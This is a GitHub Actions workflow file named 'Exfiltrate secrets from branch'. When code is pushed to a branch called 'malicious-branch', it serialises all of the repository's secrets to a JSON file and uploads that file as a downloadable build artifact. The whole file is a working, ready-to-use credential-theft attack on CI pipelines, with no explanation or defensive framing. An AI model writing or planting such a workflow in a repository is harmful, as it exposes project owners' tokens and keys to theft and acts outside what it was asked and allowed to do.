name: Exfiltrate secrets from branch

on:
  push:
    branches:
      malicious-branch

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - run: |
          echo "$ALLMYSECRETS" > secrets.json
        shell: bash
        env:
          ALLMYSECRETS: ${{ toJSON(secrets) }}

      - name: Upload secrets
        uses: actions/upload-artifact@v3.1.2
        with:
          name: secrets
          path: secrets.json
